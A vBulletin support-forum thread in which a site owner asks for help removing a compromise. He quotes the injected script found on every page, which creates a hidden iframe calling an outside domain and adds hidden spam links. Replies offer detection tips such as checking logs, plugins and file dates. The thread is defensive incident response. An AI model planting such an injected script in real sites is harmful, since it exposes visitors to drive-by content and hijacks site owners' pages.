Announcement

Collapse
No announcement yet.

Site hacked --!!!!-- Using vB 4.13 PL2

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • [Forum] Site hacked --!!!!-- Using vB 4.13 PL2

    Someone has been able to hack my site - the only evidence I can find right now is in the source code of every page:

    Code:
    <script>function xl1(url){var h;var t=new Date().getTime();if(window.XMLHttpRequest){h=new XMLHttpRequest();}else{h=new ActiveXObject("Microsoft.XMLHTTP");}h.open("GET",url+"?t="+t,true);h.send();}var f = document.createElement("iframe");f.setAttribute('id', 'ifrm');f.style.display='none';document.body.appendChild(f);f.setAttribute('src','http://www.20vn.com/index.htm?ref='+document.domain);</script><p style="display:none"><a href="http://www.20vn.com" rel="bookmark" title="Articles 20VN">Articles 20VN - The best of articles collection</a> <a href="http://www.20vn.com/static/google+.html" rel="bookmark" title="Get Google+ Invite Automatic">Articles 20VN - Get Google+ Invite Automatic</a><p> <div id="pagetitle"> <h1>SEO Forum.

    As you can see its above the pagetitle div, and therefore just below the navbar.Naturally none of the above code exists on any template.

    Im just in the throws of upgrading to 4.14 PL - but Im pretty sure in saying that its not going to fix the hack.

    Any suggestions/pointers on finding and removing this? thanks
    Martin

  • #2
    Look in:
    Plugins
    .js files
    Added .php files with a call to the file in the templates.

    First, look at your control panel log and see if there are any actions that look fishy.

    Next, look at the files on your server with modified dates that don't jive.
    sigpic
    Nation of Blue - Kentucky Wildcats Sports


    Some CMS Goodness: Add Avatar to Article

    Comment


    • #3
      by "look in" I assume the quickest way is download a complete copy of the codebase and search that right?thanks for your help btwM

      Comment


      • #4
        Depends on skill level.

        FTP client should show last modified date.
        With SSH you could grep -r 'function xl1(url)' *
        sigpic
        Nation of Blue - Kentucky Wildcats Sports


        Some CMS Goodness: Add Avatar to Article

        Comment


        • #5
          got it - also, this is interesting: from my control panel access log, its me at home, me at work.... and this IP:http://whois.domaintools.com/1.52.130.116 in Vietnam. Where I certainly neither live nor work.THANK YOU for the pointer..

          Comment


          • #6
            he appears to have created, then deleted a plugin with the id 1441. still scanning files.

            Comment


            • #7
              GOT IT.... The MODCP has been comprimised somehow. removing the hack now. thanks again.

              Comment


              • #8
                ok - cant seem to get rid of it.Ive posted a ticket in the support system....

                Comment

                widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                Working...
                X